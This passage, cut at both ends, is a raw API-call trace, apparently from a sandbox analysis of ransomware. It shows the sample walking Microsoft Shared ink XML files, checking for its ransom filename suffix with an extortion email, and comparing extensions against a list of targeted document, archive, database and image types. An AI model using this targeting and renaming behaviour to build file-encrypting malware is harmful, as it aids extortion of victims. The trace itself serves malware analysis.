shared\\ink\\ipsnor.xml")) returned 0x20 [0036.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.556] lstrlenW (lpString=".doc") returned 4 [0036.556] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString=".docx") returned 5 [0036.556] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0036.556] lstrlenW (lpString=".pdf") returned 4 [0036.556] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString=".xls") returned 4 [0036.556] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString=".xlsx") returned 5 [0036.556] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0036.556] lstrlenW (lpString=".ppt") returned 4 [0036.556] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.556] lstrlenW (lpString=".zip") returned 4 [0036.556] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.556] lstrlenW (lpString=".rar") returned 4 [0036.556] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString=".bz2") returned 4 [0036.556] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString=".7z") returned 3 [0036.556] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.556] lstrlenW (lpString=".dbf") returned 4 [0036.556] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.556] lstrlenW (lpString=".1cd") returned 4 [0036.556] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.557] lstrlenW (lpString=".jpg") returned 4 [0036.557] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.557] lstrlenW (lpString=".doc") returned 4 [0036.557] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString=".docx") returned 5 [0036.557] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0036.557] lstrlenW (lpString=".pdf") returned 4 [0036.557] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString=".xls") returned 4 [0036.557] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString=".xlsx") returned 5 [0036.557] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0036.557] lstrlenW (lpString=".ppt") returned 4 [0036.557] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.557] lstrlenW (lpString=".zip") returned 4 [0036.557] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.557] lstrlenW (lpString=".rar") returned 4 [0036.557] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString=".bz2") returned 4 [0036.557] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString=".7z") returned 3 [0036.557] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.557] lstrlenW (lpString=".dbf") returned 4 [0036.557] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.557] lstrlenW (lpString=".1cd") returned 4 [0036.557] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0036.558] lstrlenW (lpString=".jpg") returned 4 [0036.558] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.558] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.558] lstrlenW (lpString="ipsptb.xml") returned 10 [0036.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.558] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2246) returned 1 [0036.558] CloseHandle (hObject=0x1c8) returned 1 [0036.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0x20 [0036.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.559] lstrlenW (lpString=".doc") returned 4 [0036.559] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString=".docx") returned 5 [0036.559] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0036.559] lstrlenW (lpString=".pdf") returned 4 [0036.559] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString=".xls") returned 4 [0036.559] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString=".xlsx") returned 5 [0036.559] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0036.559] lstrlenW (lpString=".ppt") returned 4 [0036.559] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.559] lstrlenW (lpString=".zip") returned 4 [0036.559] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.559] lstrlenW (lpString=".rar") returned 4 [0036.559] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString=".bz2") returned 4 [0036.559] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString=".7z") returned 3 [0036.559] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.559] lstrlenW (lpString=".dbf") returned 4 [0036.559] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.559] lstrlenW (lpString=".1cd") returned 4 [0036.559] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.559] lstrlenW (lpString=".jpg") returned 4 [0036.559] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.560] lstrlenW (lpString=".doc") returned 4 [0036.560] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString=".docx") returned 5 [0036.560] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0036.560] lstrlenW (lpString=".pdf") returned 4 [0036.560] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString=".xls") returned 4 [0036.560] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString=".xlsx") returned 5 [0036.560] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0036.560] lstrlenW (lpString=".ppt") returned 4 [0036.560] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.560] lstrlenW (lpString=".zip") returned 4 [0036.560] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.560] lstrlenW (lpString=".rar") returned 4 [0036.560] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString=".bz2") returned 4 [0036.560] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString=".7z") returned 3 [0036.560] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.560] lstrlenW (lpString=".dbf") returned 4 [0036.560] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.560] lstrlenW (lpString=".1cd") returned 4 [0036.560] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0036.560] lstrlenW (lpString=".jpg") returned 4 [0036.560] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.561] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.561] lstrlenW (lpString="ipsptg.xml") returned 10 [0036.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.561] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2240) returned 1 [0036.561] CloseHandle (hObject=0x1c8) returned 1 [0036.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0x20 [0036.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.561] lstrlenW (lpString=".doc") returned 4 [0036.561] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.561] lstrlenW (lpString=".docx") returned 5 [0036.561] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.562] lstrlenW (lpString=".pdf") returned 4 [0036.562] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString=".xls") returned 4 [0036.562] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString=".xlsx") returned 5 [0036.562] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.562] lstrlenW (lpString=".ppt") returned 4 [0036.562] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.562] lstrlenW (lpString=".zip") returned 4 [0036.562] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.562] lstrlenW (lpString=".rar") returned 4 [0036.562] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString=".bz2") returned 4 [0036.562] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString=".7z") returned 3 [0036.562] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.562] lstrlenW (lpString=".dbf") returned 4 [0036.562] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.562] lstrlenW (lpString=".1cd") returned 4 [0036.562] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.562] lstrlenW (lpString=".jpg") returned 4 [0036.562] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.562] lstrlenW (lpString=".doc") returned 4 [0036.562] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.562] lstrlenW (lpString=".docx") returned 5 [0036.562] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.562] lstrlenW (lpString=".pdf") returned 4 [0036.563] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString=".xls") returned 4 [0036.563] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString=".xlsx") returned 5 [0036.563] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.563] lstrlenW (lpString=".ppt") returned 4 [0036.563] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.563] lstrlenW (lpString=".zip") returned 4 [0036.563] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.563] lstrlenW (lpString=".rar") returned 4 [0036.563] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString=".bz2") returned 4 [0036.563] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString=".7z") returned 3 [0036.563] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.563] lstrlenW (lpString=".dbf") returned 4 [0036.563] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.563] lstrlenW (lpString=".1cd") returned 4 [0036.563] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0036.563] lstrlenW (lpString=".jpg") returned 4 [0036.563] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.563] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.563] lstrlenW (lpString="ipsrom.xml") returned 10 [0036.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.564] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2644) returned 1 [0036.564] CloseHandle (hObject=0x1c8) returned 1 [0036.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0x20 [0036.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.564] lstrlenW (lpString=".doc") returned 4 [0036.564] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.564] lstrlenW (lpString=".docx") returned 5 [0036.564] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0036.564] lstrlenW (lpString=".pdf") returned 4 [0036.564] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.564] lstrlenW (lpString=".xls") returned 4 [0036.564] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.564] lstrlenW (lpString=".xlsx") returned 5 [0036.564] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0036.564] lstrlenW (lpString=".ppt") returned 4 [0036.565] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.565] lstrlenW (lpString=".zip") returned 4 [0036.565] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.565] lstrlenW (lpString=".rar") returned 4 [0036.565] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString=".bz2") returned 4 [0036.565] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString=".7z") returned 3 [0036.565] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.565] lstrlenW (lpString=".dbf") returned 4 [0036.565] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.565] lstrlenW (lpString=".1cd") returned 4 [0036.565] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.565] lstrlenW (lpString=".jpg") returned 4 [0036.565] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.565] lstrlenW (lpString=".doc") returned 4 [0036.565] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.565] lstrlenW (lpString=".docx") returned 5 [0036.565] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0036.566] lstrlenW (lpString=".pdf") returned 4 [0036.566] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString=".xls") returned 4 [0036.566] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString=".xlsx") returned 5 [0036.566] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0036.566] lstrlenW (lpString=".ppt") returned 4 [0036.566] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.566] lstrlenW (lpString=".zip") returned 4 [0036.566] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.566] lstrlenW (lpString=".rar") returned 4 [0036.566] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString=".bz2") returned 4 [0036.566] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString=".7z") returned 3 [0036.566] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.566] lstrlenW (lpString=".dbf") returned 4 [0036.566] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.566] lstrlenW (lpString=".1cd") returned 4 [0036.566] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0036.566] lstrlenW (lpString=".jpg") returned 4 [0036.566] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.566] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.567] lstrlenW (lpString="ipsrus.xml") returned 10 [0036.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0036.676] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2542) returned 1 [0036.676] CloseHandle (hObject=0x160) returned 1 [0036.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0x20 [0036.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.677] lstrlenW (lpString=".doc") returned 4 [0036.677] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.677] lstrlenW (lpString=".docx") returned 5 [0036.677] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0036.677] lstrlenW (lpString=".pdf") returned 4 [0036.677] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.677] lstrlenW (lpString=".xls") returned 4 [0036.678] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString=".xlsx") returned 5 [0036.678] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0036.678] lstrlenW (lpString=".ppt") returned 4 [0036.678] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.678] lstrlenW (lpString=".zip") returned 4 [0036.678] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.678] lstrlenW (lpString=".rar") returned 4 [0036.678] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString=".bz2") returned 4 [0036.678] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString=".7z") returned 3 [0036.678] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.678] lstrlenW (lpString=".dbf") returned 4 [0036.678] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.678] lstrlenW (lpString=".1cd") returned 4 [0036.678] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.678] lstrlenW (lpString=".jpg") returned 4 [0036.678] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.678] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0036.678] lstrlenW (lpString=".doc") returned 4 [0036.678] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString=".docx") returned 5 [0036.678] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0036.678] lstrlenW (lpString=".pdf") returned 4 [0036.678] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.678] lstrlenW (lpString=".xls") returned 4 [0036.679] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.679] lstrlenW (lpString=".xlsx") returned 